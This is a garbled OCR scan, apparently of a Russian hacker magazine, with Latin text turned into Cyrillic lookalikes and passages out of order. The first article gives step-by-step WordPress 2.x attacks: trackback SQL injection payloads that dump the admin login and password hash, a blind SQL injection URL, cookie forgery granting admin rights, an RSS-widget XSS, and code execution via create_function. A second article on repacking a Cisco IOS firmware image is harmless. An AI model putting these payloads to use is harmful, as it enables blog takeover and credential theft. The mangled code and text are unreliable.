<іприк куре= 1 МеМеп 1 пате= 1 зісІеЬаг 1 
ѵа1ие= ’мр_с1азкЪоагс1' /> 

<іприк куре= 1 МеМеп ' пате= 1 \ѵіс!дек_іс1 ' 
ѵа1ие= ' <ТазкЪоагс1_п?гітагу ' /> 

<іприк куре= ' зиЪтік ' ѵа1ие= ' Заѵе ' /> 

</ когт> 

В итоге, ты увидишь на главной странице админки блога 
свой еѵіі-гзз :). 

Ах да, для использования этой уязвимости необходимы: 

1. Открытая регистрация на блоге; 

2. Версии движка от2.5 до 2.6.5 включительно. 

г ЭТИ ЗАБАВНЫЕ ПИНГИ. ЧАСТЫ 

Так уж сложилось, что наибольшее число уязвимостей 
ѴѴогсІРгезз пришлось какраз натехнологии РіпдЬаски 
ТгаскЬаск. Вот и на этот раз, копаясь в функциях, отвечаю- 
щих за пинги, я нашел сразу 2 (!) фрагментированные зц I- 
инъекции во всех версиях движка до 2.5.1 включительно и с 
правами аиіЬог/ебког (ѴѴогсІРгезз МЭ аізо аМесІеб). 

Для наглядности возьмем подопытный движокза номером 
2.3.3. Открывай ./ѵѵр-іпсІибез/розТрбр и находи в нем код: 



Ьиу ѵіадгй му*! 

РеЬгѵагу 21, 200? а* 3:4$ рт (ЕйЙ) 

Ьиу ѵіддга.,. 

Ьиу ѵіадга... 

Купить слона *ау*: 

РеЬгоагу 21, 200? аі Э:47 рт (Еіііе) 

Купить СП ОН Он., 

Купить СПС на.., 

| Адрес: Ыф:|/уа.пі/| 

Спам в комментариях 

$мрсПэ->розкз ѴШЕЕЕ ІБ = $розк_іс!" ) ; 

$рипд = кгіт($рипд) ; 

$рипд = ргед_зр1ік ( ' /\з/ ' , $рипд) ; 

$рипд [ ] = $игі ; 

$пем = ітріосіе ( " \ п" , $рипд) ; 

$пеѵ'7 = арр1у_кі1кегз ( 'асШ^рл-пд' , $пем) ; 
гекигп $ѵдр(іЬ->С[иегу ( "БРБАТЕ $ѵтрсПэ->розкз 
ЗЕТ ріпдесЗ = ' $пеѵЩ ѴШЕКЕ ІБ = $розк_іс!" ) ; 

} 

Небольшие раскопки дают понять, что фильтра «абб_ріпд» 
не существует в коде движка. 

Получается, что данные из первого запроса подставляются 
во второй запрос без какой-либо фильтрации! Атеперь 
о способе эксплуатации данной уязвимости. Запасись 
терпением :). Чтобы использовать баг, тебе необходимо две 
инсталляции вордпресса: 

1. Все равно какой версии. Создай новый посте любым тайт- 
лом и содержимым: 

<а Ь.гек= "Ь/ккр: / /ВТОРОЙ_БЛОГ/ ?р= [НОМЕР_ 

ПОСТА] " >ріпдше</а> 

Запомни адрес созданного поста [например. ШрУДатег/ 
ѵѵр 1 /?р=2) . 

2. Во втором блоге ветки 2.3.Х-2.5.1 создай постслюбым содер- 
жанием и любым та йтлом, а в поле «ЗепсЙгаскЬаскзІо:» пиши: 

кезк ' , розк_кік1е= (зеіеск/** /сопсак (изег_ 
Іодіп, ' : ' , изег_разз) /**/кгош/**/ѵтр_изегз/**/ 
ѵкЬеге/**/іс1=1) ,розк_сопкепк_кі1кегес1 = 'Ыак 



кипскіоп ас!с1_ріпд ( $розк_ісі, $игі) { 

// Асій а ІЖБ ко кЬозе аігеасіу рипд 
дІоЬаІ $юр<ЗЬ; 

$рипд = $ѵтрсПэ->дек_ѵаг ( " ЗЕБЕСТ ріпдей ЕЕОМ 



Сохраняй пост. 

Снова заходи в его редактирование, но теперь редактируй 
само содержимое и вставля йтуда ссылку в Ыті- фор мате на 
пост из первого блога: 
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Ра гзе_з1:г5д 1-инъекция 



Здесь мы наблюдаем туже ситуацию: переменная $Іо_ріпд подставляет- 
ся в следующий запрос без какой-либо фильтрации. 

Использовать эту 50І_-инъекцию очень просто. 

1. Создавай новый пост и в «5епсІ ІтаскЬаскз Ію:» вставляй следующее: 



<а кге1= "кЦЦр : //Іашег/ѵфі/ ?р=2 " >ріпдше</а> 



кезк , розЦ_ЬіРІе= (зе1еск/**/сопсак (изег_ 

Іодіп, ' : ' ,изег_разз) /* Ѵігот/* Ѵѵф_изегз/**/ѵ1кеге/**/ 
і<3=1) , розк_сопкепЦ_:ЕіІЦегес1=ТКІМ (КЕРЬАСЕ (Ро_ріпд , 1 ЫаЬ. 



Готово! Сохраняйся, переходи на страницу нашего поста и наслаждайся 

НЕ МОГУ НЕ ПОДЕЛИТЬСЯ С 
ТОБОЙ ЕЩЕ ОДНОЙ ЗАБАВ- 
НОЙ БСИ-ИНЪЕКЦИЕЙ, 

РАЯ ПРИСУТСТВУЕТ ВО ВСЕХ 
ВЕРСИЯХ ДВИЖКА, НАЧИНАЯ 
С 2.3.Х И ЗАКАНЧИВАЯ ПОС- 
ЛЕДНЕЙ НАДАННЫЙ МОМЕНТ 
2.7.1. 



2. Сохраняй пост, заходи в редактирование вновь созданного поста и 
опять вставляй туда тот же самый код; 

3. Сохраняйся и наблюдай втайтле поста логин и парольадмина. 

В КОВАРНЫЙ РАК5Е_5ТК 

Не могу не поделиться стобой еще одной забавной 501-инъекци- 
ей, которая присутствует во всех версиях движка, начиная с 2.3.x и 
заканчивая последней на данный момент 2. 7.1. Для использования 
инъекции необходимы права «тападе_1іпк5». Для теста снова возь- 
мем ѴѴогсІРгезз 2.3.3. Итак, открывай ./ѵѵр-абппіп/[іпк-тападег.рЬр . 

В этом файле присутствует следующий код: 

деС_Ьоокшагкз ( " сакедогу=$сак_іс1&Ъ.іс1е_іпѵізіЪ1е=0&огс1е 
гЪу=$зд1ог<іегЪу&Мс1е_етрЦу=0 " ) ; 

Начиная отэтого кода, попробуем провести небольшой реверсинг: 

./ѵѵр-іпсІисіез/Ьооктагк.рЬр 

Іипскіоп дек_Ьооктагкз ( $агдз = ' ' ) { 



результатами выполнения скули в виде хеша и пароля админа. 

Н ЭТИ ЗАБАВНЫЕ ПИНГИ. ЧАСТЬ 2 

Вторая 501-инъекция присутствует в механизме трэкбэков и выглядитуже не 
такужасно. Открывай файл ./ѵѵр-іпсІибез/соттепГрбр и находи в нем код: 

ІипсСіоп с!о_1ігаскЪаскз ( $розк_іс1) { 

$ко_ріпд = дек_Ьо_ріпд ( $розк_іс1) ; 



$г = члгр_рагзе_агдз ( $агдз, $0е^аи1кз ) ; 
ехкгаск ( $г, ЕХТК_ЗКІР ); 



і к ( ! ешрку ( $сакедогу_паше) ) { 

і к ( $сакедогу = дек_кегш_Ьу ( 'паше' , 
$сакедогу_паше , ' 1іпк_сакедогу ' ) ) 

$сакедогу = $сакедогу->кегт_іс1; 



} 



ІГ ( $ко_ріпд ) { 

Іогеаск ( (аггау) $ко_ріпд аз $СЬ_ріпд ) { 

$СЬ_ріпд = кгіш ( $СЬ_ріпд) ; 

іі ( ! іп_аггау ( $СЬ_ріпд , $ріпдеО) ) { 

ЦгаскЬаск ( $СЬ_ріпд , $розк_Ьі1і1е , 

$ехсегрк, $розк_іс1) ; $ріпдесі[] = $СЬ_ріпд; 
} еізе { 

$ѵ\фс!Ь->диегу («БРБАТЕ $ѵтрс1Ъ->розЦз ЗЕТ ко_ 
ріпд = ТКШ ( КЕРЬАСЕ (к о_ріпд, ' $СЬ_ріпд' , * ' ) ) ШЕКЕ ІБ = 
' $розк_іс1 ' " ) ; 

} 

} 

} 

} 



./ѵѵр-іпсІисІезДогтаШпд.рЬр 

Іипскіоп ѵгр_рагзе_агдз ( $агдз, $сЗе€аи1кз = ' ' ) { 
ІГ ( із_оЬз еск ( $агдз ) ) 

$г = дек_оЬз еск_ѵагз ($агдз) ; 
еізе і Г ( із_аггау( $агдз ) ) 

$г =& $агдз ; 

еізе 

ѵгр_рагзе_зкг ( $агдз, $г }; 



} 



іі ( із_аггау( $0е1аи1кз ) ) 

геРигп аггау _тегде ( $0е1аи1кз / $г ); 

еізе 



геРигп $г; 
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Мадіс 5 Е 0 Т00І2 — мой сборникэксплойтов для ѴѴогсІРгезз 



НипсСіоп ѵ\гр_рагзе_зкг ( $зкгіпд, &$аггау ) { 
рагзе_зБг( $зкгіпд, $аггау ); 

ІН ( деЦ_шадіс_диоДез_дрс ( ) ) 

$аггау = зкгірз1аз1іез_с1еер ( $аггау ) ; 
$аггау = арр1у_ЕіШегз ( ' ѵф_рагзе_зБг ' , $аггау ) ; 

} 

./ѵѵр-іпсІисІевЛахопоту.рЬр 

бипсБіоп деБ_Ьегт_Ьу ( $:Еіе1с1, $ѵа1ие, $Бахопоту, $оиБриБ 
= ОВБЕСТ, $:ЕіІЦег = 'гам') { 

} еізе ІИ ( 'паше' == $:Еіе1с1 ) { 

// Аззише аігеасіу езсаресі 
$:Еіе1с1 = ' Б. пате'; 

$Бегт = $ѵфс!Ь->деБ_гоѵЩ "ЗЕБЕСТ В.*, ЕЕ.* ЕКОМ 
$мрс!Ъ->Бегтз АЗ В ІШЕЕ БОШ $ѵ^с1Ь->Бегт_Бахопоту 
АЗ ЕЕ (Ж В . Бегт_іс1 = ЕЕ . Бегт_іс1 ѴШЕЕЕ ЕЕ . Бахопоту = 

' $Бахопоту' АББ $Біе1с1 = ' $ѵа1ие ' ЫМІТ 1") ; 

На этот раз разработчики ѴѴогсІРгезз не учли, что: 

1. Функция рагзе_з[г проводит свои параметры через игШесобе, а зна- 
чит, какая-либо фильтрация идетлесом (плюс\л/р_рагзе_5Іг дополни- 
тельно проводит наши данные через зітірзіазбез); 

2. В де[_Ьооктагкз(] мы сможем передать дополнительные параметры 
для рагзе_5Ітс помощью амперсанда (%26 в игіепсобе]. 

Отсюда, как логичный вывод, следует Ыіпб зд 1-инъекция: 

ЬББр : //Іагпег . сош/ѵтр23 3 /ѵѵр-асітіп/ііпк-тападег .р1тр?саВ_ 
ісі=а11%26саБедогу_пате=0%2527+ипіоп+зе1есБ + 1 , 2 , 3 , 4 , 5 , 

6 , 7 , 8 , 9 , 10 + Вгот+ѵф_изегз+ѵ\4геге+1 = 1/*&ог<іег_Ъу=огс1ег_ 
иг1&асБіоп=Брс1аБе+%С2 %ВВ 

Условия здесьтакие: 

а] 1 =1 — ничего не отображается; 

б] 1=2 — отображается список ссылок блога. 



Б ѴѴ0К0РКЕ55 2.5 СООКІЕ ІЫТЕОРІТѴ 
РКОТЕСТІОЫ ѴІЛ.НЕКАВІИТѴ 

Еще одна интереснейшая логическая уязвимость, которой уде- 
лили недостаточно внимания, — это «Соокіе Іпіедгбу Ргоіесбоп 
Ѵи Іпега Ьі Ііііу». Ей подвержен ѴѴогбРгезз 2.5. В официальном абѵізогу 
насчет реальной эксплуатации баги сказано мало и не совсем понят- 
но, — так что многие до сих пор у меня интересуются, как ее использо- 
вать. Суть баги достаточно проста: начиная с версии 2.5, в ѴѴогбРгезз 
появилась новая система авторизации и хранения паролей, которую 
до конца еще не успели отладить. Для авторизации на блоге исполь- 
зуется следующая схема формирования кукисов: 

" Ѵ\гогс1ргезз_" . СООКІЕНАЗН = БЗЕКБАМЕ . " | " . ЕХРІВУ_ТІМЕ . 

" I " • МАС 

Расшифровка этих непонятных символов элементарна: 

СООКІЕНАЗН — тб5 -хеш ІЭРЕа сайта, где установлен движок; 
ІІ5ЕКІЧАМЕ — логин авторизуемого юзера; 

ЕХРІВѴ_ТІМЕ — время истечения жизни кукисов; 

МАС — злостное сочетание из НМАС-кода, полученного на основе имени 
юзера и времени жизни кукисов, а также секретных ключей из конфига и 
БД. Если ты еще не понял, то скажутебе, что проблема заключается как 
раз в способе конкатенации этихзначений. 

А теперь внимание, — способ эксплуатации уязвимости: 

1. Регистрируй юзера с именем «абтіп99»; 

2. Авторизуйся на блоге; 

3. Отредактируй свои кукисы (в Опере: Инструменты Дополнительно 
-> Редактирование соокіез] следующим образом: 

Было : 

ѵтогс!ргезз_ [ХЕШ] = асЗшіп99 I время | МАС 
Стало : 

ѵгс>гс1ргезз_ [ХЕШ] = асЗтіп | 9 9 время | МАС 

В итоге, с новыми кукисами ты благополучно авторизуешься с правами 
админа. 

В ѴѴ0К0РКЕ55 2.7.Х АОМШ НЕМОТЕ СОРЕ ЕХЕСІІТІОМ ЕХРШТ 

Выполнение произвольного кода в админке через сгеаіеДюпсЕоп (баг 
нашел некий ПуаДригеіоІ:]] — еще одна интересная уязвимость, поче- 
му-то оставшаяся не только без внимания хакеров, но и без внимания 
разработчиков! 

Эксплойт к ней появился еще в версии 2.7, но в последнем вордпрессе 
(сейчас — 2.7.1 ] дыра по-прежнему не закрыта. 

Проведем небольшой аудит кода ./ѵѵр-абтіп/розЕрЬр: 

і Е ( сшггепБ_изег_сап ( ' ес!іБ_розБ ' , $розБ_ІБ) ) { 

ІБ ( $1азБ = ѵдэ_сЬеск_розБ_1оск ( $розБ->ІБ ) ) { 
$1азБ_изег = деБ_изегс1аБа ( $1азБ ) ; 
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иК1_: ІіЩэ ://ѵѵ*ѵѵ . БвшпЬуРосиз .сот/а гсЬіѵв/1/496287 

14 и/огйриѳзз Кепйот рймѵогй ѳопегзОоп ігеиНГкаег* епщэру ѵѵезкпеээ (УіЛгтегаЬЙКіез] 
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ВЗЛОМ 






Ргітагу Реесі 



5е«-Д1І I СапсеІ | 0Е1* 



Еглег йте Р35 Гмгі щи* Неге: 



И М р : //т у е ѵіі > с отДее с! ► х т(| 


Сіѵе Ще Геей а Ше (орйопаі): 


Му еѵіі Геесі 


НоѴ'.і тапѵ ісетз шоиій уоч Ііке [о Йізріау? 2 




^ [Жріау Лет сопьет? 




Г” Оігріау Лет аиіЬог іГ аѵаіІаЫе? 




^ Оі^ріау Лет йаіе? 








Редактирование Р55-фида в ѴѴогсІРгезз 2. 5-2. 6. 5 



Уязвимости ѴѴогсІРгезз 



Работа одного из приватных эксплойтов для 2.x ветки 



[+] По; 



КС 



\ѵр_ 



$1азД_изег_паше = $1азД_изег ? $1азД_изег- 

>с!ізр1ау_пате : ( 1 ЗотеЬосІу 1 ) ; 

$теззаде = зргіпДі ( ( ’Шгпіпд: %з із сиггепШу 

есііДіпд Йііз розД ' ) , ѵѵр_зресіа1с1іагз ( $1азД_изег_пате ) ) ; 

$теззаде = зДг_гер1асе ( , " \ 1 " , "<с!іѵ 

с1азз= 1 еггог ' ><р>$теззаде</рх/с1іѵ>" ) ; 

ас!с1_асШіоп ( ' ас!тіп_поЦісез ' , сгеаЦе_іипсЩіоп ( 

' ' , "есію ' $теззаде' ; " ) ) ; 

} 

еізе { ѵ\7р_зеЦ_розЦ_1оск ( $розк->ІБ ); 
ѵф_епдиеие_зсгірД ( ' аикозаѵе ' ) ; 

} 

} 

Из анализа этого кода видно, что юзер с правами «есі И:_ро5І:» может 
провести инъекцию произвольного кода следующим образом: 

1. Сменить значение «сІІ5рІау_пате» на что-то вроде \’;рбріпі : о();\’. В 
результате переменная $теззаде будет выглядеть так: 

Шгпіпд : \ ' ; ркріпіо ( ) ; \ ' із сиггепкіу есІіДіпд Шз розД 

2. Когда $теззаде пройдет зігірзіазбез и попадет в сгеаІеДипсбопО, 
создастся функция стаким вот интересным телом: 

{ 

есію ' ссііѵ с1азз= ' еггог 1 ><р> ' ; ркріпіо ( ) ; ' </рх/с1іѵ> ' ; 

} 

Как видишь, налицо банальный собе ехес. Ссылку на эксплойт ищи в 
сносках. Добавлю, что эксплойт предназначен для юзера с правами 
абтіп, но, немного подумав, ты сможешь исправитьего для работы с 
правами аибаог/ебКог. 

Н ИТОГИ 

Жесткие рамки статьи не позволяют рассказать обо всех найденных 
мной и другими людьми уязвимостях ѴѴогсІРгезз, ноя этого и не хочу 
:). Описанные тут уязви мости — лишь верхушка айсберга. Сущест- 
вуют гораздо более серьезные и полезные баги во всех, даже самых 
последних, версиях движка. Эти баги не только стоят множество зе- 
леных президентов, ной позволяют безбедно жить на поприще 5Е0. 
Поэтому могу лишь пожелать разработчикам вордпресса оставаться 
такими, какие они есть: невнимательными и забавными в своей 
простоте . "г 
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ЕВГЕНИЙ «5НАСІ05» ХАБАРОВ 

/5НА005(аМАИ..ІШ/ 

ИМПЛАНТАЦИЯ 

СІ5С0 

МОДИФИЦИРОВАНИЕ ПРОШИВКИ МАРШРУТИЗАТОРА 

Приветствую, дорогой друг! Сегодня мы будем дарить вторую молодость 
(а может даже и жизнь) старым маршрутизаторам Сізсо, практически не на- 
рушая лицензионного соглашения. Пусть этот хакерский метод достаточно 
прост, но от этого он не становится менее интересным. Имя ему — «бинар- 
ный патчинг». 



Сразу к делу. Исходные данные следую- 
щие: старенькая кошка Сізсо 261 1 с двумя 
ЕіЬегпеі-портами, 64 Мб ВАМ и 16 Мб на 
Ріазб. Это максимально возможные пара- 
метры, поддерживаемые платформой (читай 
— увеличить объем ИВАМ памяти и ііазЬ 
не получится из-за отсутствия в природе 
комплектующих больших объемов]. Исходя 
из данных Сізсо 105 Реаіиге Ыаѵідаіог [ іооіз. 
сізсо. сот/1ТР1Т/СГ1\1/]зр/тс1ех.]5р ]. послед- 
ней версией ІОЗдля этого маршрутизатора 
является 12.3(26] — вполне естественно для 
столь старого продукта (ЕпсІ-оі-5аІе — апрель 
2003, ЕпсІ -об- Рібе — апрель 2008]. Хочется 
получить только все самое последнее и новое, 
а все самое новое и вкусное доступно только в 
версии 1 2.4 (точнее 1 2.4Т]. Посыл номер два, 
или дополнительные исходные данныетако- 
вы: если внимательно следить за модельным 
рядом маршрутизаторов Сізсо или просто 
ознакомиться с информацией о продуктах на 
официальном сайте, то можно обнаружить, 
что серия 2600 включает в себя, например, 
маршрутизаторы 261 1ХМ. Отличается эта 
серия отсвоего предшественника незначи- 
тельно: 

• Максимальный объем Назіі-памяти 
увеличен до 48 МВ (в 2611 — 16 МВ) 

• Максимальный объем ЗБКАМ-памяти 
увеличен до 12 8 МВ (в 2 611 — 64 МВ) 

• Интегрированные 10/100 ЕазС 
ЕбЬегпеб порты (в 2611 — 10 Мбит /с 
ЕбЬегпеб) 



Для такой кошки Сізсо 105 Реаіиге Ыаѵідаіог 
сообщит, что последний 105 имеет версию 
12.4(23]. Системные требования для 105 12.4(21] 
с набором Епіегргізе Вазе или АбѵапсесІ 
5есигйу составляют 128 МВ РВАМ и 32 МВ 
ііазб. Конечно, у нас нет 128 МВ памяти, но 
попытка не пытка, да и пропускная способность 
портов у нас невысокая. Это позволяет сделать 
предположение, что ОС можно запустить на 
моем устройстве. Осталось превратить теорию 
в практику. 

Н ЕХТЕМОЕО, ИЛИ ЧТО ХОТИМ ПОЛУЧИТЬ 

Идея проста — загнать бинарный образ 
операционной системы Сізсо 105 12.4(21] 
с набором фьючерсов Епіегргізе Вазе на 
старенький маршрутизатор 261 1 с исходными 
данными, представленными выше. 

В дальнейшем — использовать как тестовый 
стенд, ибо 1 0-мегабитные интерфейсы огра- 
ничивают его применение в дикой природе, 
или, как говорится, іп ргобисбоп. С тем же 
успехом устройство может надежно служить 
файрволом корпоративной сети взамен 
какого-нибудь РІХ (если, конечно, достаточно 
пропускной способности в 1 0 Мбит], но тогда 
встает вопрос — а есть ли такой функционал, 
который может потребоваться в 105 1 2.4, но 
которого нет в 1 2.3? За подсказкой вновь 
отправляю к Сізсо 105 Реаіиге Ыаѵідаіог ( іооіз. 
сізсо.сот/ІТРІТ/СГІМ/РізраІсЫ . Утилита 
сравнения образовтебе в помощь, но ответ, 
скорее всего, — «нет». Отсюда вывод — не 
стоит меня корить в малой практичности, так 



как изначально статья в большей степени 
исследовательская (щзі бог би п] . 

У меня не возникло бы потребности писать 
статью, если бы не две небольших проблемы. О 
первой я уже упомянул — это объем СРАМ па- 
мяти. Ксожалению, я не повелитель паяльника 
и вольтметра, так что здесь поделать ничего не 
могу. Стоиттолько надеяться, что ОС не уйдет 
в соге в самый ответственный момент из-за 
недостатка памяти. Вторая проблема, которая 
застигла меня врасплох — это размер самого 
образа 105 12.4 и тот факт, что он не помещается 
на флеш объемом 16 МВ. И неудивительно: 
файл образа — с2600-еп1;Ьа5ек9-пп2. 124-9. 

Т1 .Ьіп — который я взял для эксперимента, 
занимает 16,4 МВ, то есть 17 257 364 байт. 

Даже если стереть флеш с опцией по-здиееге- 
гезегѵе-зрасе (командой егазе/по-здиееге- 
гезегѵе-зрасе біазбі:], это нам не поможет. 

Хотя, в свое время, для образа с2600-ік9оЗзЗ- 
пп 2 . 123-13. Ьіп было решением проблемы (этот 
образ чуть меньше размера самой флеш, и для 
его загрузки требуется отформатировать ее с 
опцией, запрещающей резервировать свобод- 
ное место]. 

Н ЧТО ДЕЛАТЬ? БЕЖАТЬ! 

Решения здесь может быть два — либо грузить- 
ся с Іббр, что не всегда удобно, либо же взломать 
образтак, чтобы размер стал меньше. Грубо 
говоря, перепаковать его (собственно, это и 
было отчасти сделано]. 

Посылом номертри стал эмулятор Рупатірз. 
Причем онтут? Именно он натолкнул меня на 
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»Типы 105 
и их функционал 



** ЕІСВР-5ТІІВ іп ІР Ваге ѵііі Ье аѵаіІаЫе оп Сігсо Саіаіугі: 4500 5егіег (5ир4) 
ап<1 Сігсо Саіаіугі: 6500 5егіег. 

*** З^-аг'Впд ѵі*Ь 1 2.2(33)5X1 оп 6500 гегіег, Сігсо іг оГГегіпд раскадіпд 
рагі*у ■Гог ІРѵб Гоа^иго гиррогі: Гог а *есЬпо1оду ѵііі Ье р-аскедегі іп гато 

Гоа^иго геі: аг ІРѵ4. ТЬіг р-агі^у ѵііі Ье ехрепгіегі *о о*Ьег рІа^Гогтг іп Ги*иге. 



г - ТЬе ішаде гипз кгош КОМ 

1 - ТЬе ішаде із геіосакаЫе 

2 - ТЬе ішаде із гір сошргеззесі 
х -ТЬе ішаде із шгір сошргеззесі 

В нашем случае образ имееттип тг — работает в памяти и запакован как 
раз в 2 Ір-архив. Убедиться в этом просто — большинство архиваторов 
(ѴѴіпХІР, ѴѴіпРАР, 7гір] с легкостью открываютего и распаковывают. 



мысль о перепаковке образа. Если взглянуть на раздел «Ноѵѵіо изе?» на 
официальном сайте проекта ( ѵѵѵѵѵѵ.ірЬо\уиісЗг/іпбех.рбр/СІ5СО 7200 
5ітиІа1:ог ).то можно обнаружить, что эмулятор использует распакован- 
ные образы для ускорения загрузки: 



Н УПАКОВКА 

Не мудрствуя лукаво, пытаемся перепаковать архив заново с макси- 
мально возможной степенью сжатия. Сразуже отмечаем, что используе- 
мый метод — беііаіе и изменить его не получится. Я использовал четыре 
архиватора, чтобы сравнить их и получил такой результат: 

7-гір 4.65 со следующими параметрами: 

Формат архива — гір 



<зкірресі> 

То Ъоок диіскіу, кЬе ргекеггесі текЬосІ із ко сіесотргезз 
кЬе 103 ішаде члікЬ кЬе «ипгір» икіііку. Ік аѵоісіз ко гип 
кЬе зеік-сіесошргеззіпд ргосезз іп кЬе ешиіаког. 
сЬгіз@рогксЬгіз2 : ~/сІупатірз-0 . 2 . 5$ ипгір -р с7200- 
а<іѵірзегѵісезк9-Ш2 . 12 4-9 . Т . Ьіп > ішаде. Ьіп 
члагпіпд [с72 00-асіѵірзегѵісезк9-т2 . 124-9 . Т . Ьіп] : 27904 
ехкга Ьукез ак Ьедіппіпд ог члікЬіп гіркііе 
(аккешркіпд ко ргосезз апучлау) 
сЬгіз@рогксЬгіз2 : ~/сіупатірз-0 . 2 . 5$ кііе ішаде. Ьіп 
ішаде. Ьіп: ЕЬР 32-Ьік МЗВ ехесикаЫе, сізсо 72 00, 
ѵегзіоп 1 (ЗУЗѴ) , зкакісаііу ІіпкеЬ, зкгірреЬ 
Уои сап ідпоге кЬе члагпіпд, ипгір Ьаз зизк зкірреЬ кЬе 
зеік-Ьесошргеззіпд соЬе ак кЬе Ьедіппіпд ок кЬе ішаде. 
Шж, уои сап Ьоок кЬе ішаде 
<зкірресЬ> 



Если есть запакованный образ, то можно попытаться использовать 
более оптимальные параметры сжатия, которые позволят поместить 
образ на флеш. Обращаю внимание на важную деталь — таккакмы 
не собираемся переписывать самораспаковывающийся код, то есть 
заниматься дизассемблированием (да и ассемблер под 32-битные 
процессоры РоѵѵегРС я не знаю], то сам алгоритм сжатия менять мы не 
сможем. Самораспаковывающаяся часть просто не сможет распаковать 
архивы, сжатые другими методами. По поводу используемого в образе 
алгоритма сжатия — можно взглянуть вотсюда: Сізсо 105 Сопіідигабоп 
Еипсіаппепіаіз СопбдигаЬоп Сиібе, Реіеазе 12.4 — Еоабіпд апб Мападіпд 
Бузует Ітадез, пункт Ітаде Ыатіпд СопѵепЬопз. Поле «тип» в имени 
образа как раз отвечаетза его характеристики: 

к - ТЬе ішаде гипз кгош кІазЬ шешогу 

ш - ТЬе ішаде гипз кгош ВАМ 



Уровень сжатия — Ультра 
Метод сжатия — Бекіаке 
Размер словаря — 32КВ 
Размер слова — 258 

В результате был получен архив: 1 5,7 МВ (1 6 489 764 Ьукез] . ѴѴіпХІР 
1 1 .2 при использовании улучшенного метода Оеііаіе выдал файл 
размером 1 6,0 МВ (1 6 803 634 Ьуіез]. ѴѴіпРАР 3.80, формат архива — 
гір с наилучшими параметрами сжатия: 16,3 МВ (17131 353 Ьукез] . 
РК2ІР 9.00 от создателей формата совсем подвел, и по методу Оеііаіе 
с максимальным сжатием произвел файл размером 1 6,3 МВ (1 7 094 
474 Ьуіез]. 

Итогом моего небольшого сравнительного тестирования стал выбор для 
экспериментов архива, как нетрудно догадаться, созданного 7гір. 
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СівГО 103 Зоііжаге, С2600 Зоііѵасе <С2 680-ЕНТВАЗЕК9-Щ , ѴіГЭЮй 12.4(9]Т1. ЕЕ1Е А5Е 50? 
ТУЛРЁ (Іс2) 

1 5чр рагР : ЬБЪр ; / / «теги . с І ?С9 * СВДУ' ЬчеЪзирррт С. 

Ссрусідік. (с) іге$-200б &у сігсо зуэсето*, . 

Сагорі1е<3 Чей ЗО-Аид-Об 15:43 Ьу рЬйй_і: ё 1_Е.еті 
Іидде сехі-Ьазе: 0хва0085Ё4, (Заіа-Ьазе: ахЭ1В4бС0а 



00:03:16 ІІТС Ріі Нас 1 2002: Опеиресіей ехсвртіійп С.й СРО^сЧЫ: 700. РС - ОХ.85Й90Е48,. 

ьн - оиаобэсоез 

-ТГшгеЬоск- 0к8049&Е4Э 0*8069М>&& ОявООИВЮ 0*&1впИАА4 ОХВ170312С 0к3170в2А4 0*916ЕЭС 
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ЕІТ32_На1:Е е_рЬепРзІ 2 е; 
Е1Т32_На1:Е е_рЬпит; 
Е1Т32_На1:Е е_зЪ.епЕзІ 2 е; 



СММ«т ЛК8ІЛ8СІ 
»|М4РЙГР40* іа.іь-зо4 



Контрольная сумма 



0*Р**ІІ 

00Р35480 

00Р35490 

ООГ354ЛО 

00Г354В0 

00Р354С0 

00935400 

00Р354Б0 

00Г354Е0 

00Г35500 

00*35510 

00Р35520 

00К35530 

00Г35540 
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80 61 СО ВВ 34 4В 20 93 
Е1 ЕЬ 93 Л2 4Г ѲА 69 4В 
14 К8 91 15 ОС С2 >1 С8 
6С ЬЕ ВГ 22 *2 СС В7 ОС 
50 4В 01 02 14 00 14 00 
А2 66 11 В5 86 08 93 00 
00 00 00 00 00 00 20 00 
36 30 30 20 41 44 2В 42 
00 00 01 00 01 00 ЗА 00 
00 00 00 0О 00 00 00 18 
4Р 20 53 59 ±1 51 15 1Р 
00 00 00 10 Ьа Р2 Сб 59 
45 40 ?9 СРІ ~^ 



8 9 А В С О 
96 Ю 68 50 84 07 
73 А7 21 42 А7 ВР 
98 70 А1 26 С5 39 
В2 РВ 50 62 РВ ВВ 
00 00 08 00 16 ОС 
6В 85 75 02 ОС 00 
00 00 00 00 00 00 
49 4В 50 4В 05 Об 
00 00 ВО ОВ РЗ 00 
РВ ВО ВА СО 43 49 

■53..0Д-ДД .ДД.ХЛ ДЁ. 

1Р Р 4 РО 33 42 51 



_ Ё Р *1 

5С ІА а«Нв4К *- I 
ОВ РА 6«*?0&ІК« 

7С СЗ Гн >. ЬВ»И > 
ор ір 1юп"*ни. 1 

БА 38 РК 

00 00 ^Р.цІ.у.Ь 

43 32 

00 00 600-АО. В1 

00 00 

53 43 ю 

РА 01 О ВУ8ТБМ8 
47 РК «Т*Ѵ. 



Сообщение о нехватке памяти 



Е1Т32_На1:Е е_зЬгшт; 
ЕІТ32_На1:Е е_зЬзРгпс1х; 



Н ТЕОРИЯ (ИНТЕГРАЦИИ НОВОГО АРХИВА) 

Далее требуется сей архив поместить вместо оригинального образа. 
Чтобы проделать это, нам понадобится шестнадцатеричный редактор 
типа ѴѴіпНех, НТ Ебііогили Ьѵіеѵѵ. Я предпочитаю ѴѴіпНех, но понадобит- 
ся еще и НТ, чуть позже объясню почему. 

Какты можешь видеть на скриншоте, бинарный образ 105, скорее всего, 
есть не что иное, как исполняемый файл в формате ЕІ_Р (ЕхесіЛаЫе 
апб ЫпкаЫе Рогтаіе]. РРР-форматявляется основным исполняемым 
файлом в *піх-1іке системах, поэтому неудивительно встретить его здесь. 
По РИР-формату существует четкая спецификация, последняя версия 
которой 1 .2, однако для наших целей будет достаточно, например, заго- 
ловочного файла из состава ІіЬс — еІТЬ. Обычный бинарный ЕІ_Р-файл 
представляет собой структуру вида: 

ЕЬЕ НеасЗег 

Ргодгат НеасЗег ТаЫе (орРіопа!) 



} Е1Т32_ЕМг; 

В нашем случае поле е_тасЫпе имеетзначение 0х002Ь или 43, что 
соответствует процессору 5РАРС ѵ9: 

#сіеТіпе ЕМ_8 РАЕСѴ9 43 /* ЗРАКС ѵ9 64-ЬіР */ 

Но нам известно, что маршрутизатор 261 1 использует процессор 
МоІогоРа МРС860, значит, поле должно иметьзначение 0x0014, — что 
соответствует: 

#сіе^іпе ЕМ_РРС 2 0 /* Ро\тегРС */ 

Скорее всего, это простейшая защита отдизассемблирования образа. 
Нам это не сильно помешает. С помощью Р6 открываем режим просмот- 
ра еіі/беасіег. Из него становятся известны следующие подробности: 



ЗесДіоп 1 



- е1± Ьеасіег зіге 0x34 



ЗесДіоп 2 
ЗесДіоп п 

ЗесДіоп Неасіег ТаЫе 



- ргодгат Ігеасіег епДгу зіге 0x2 0 

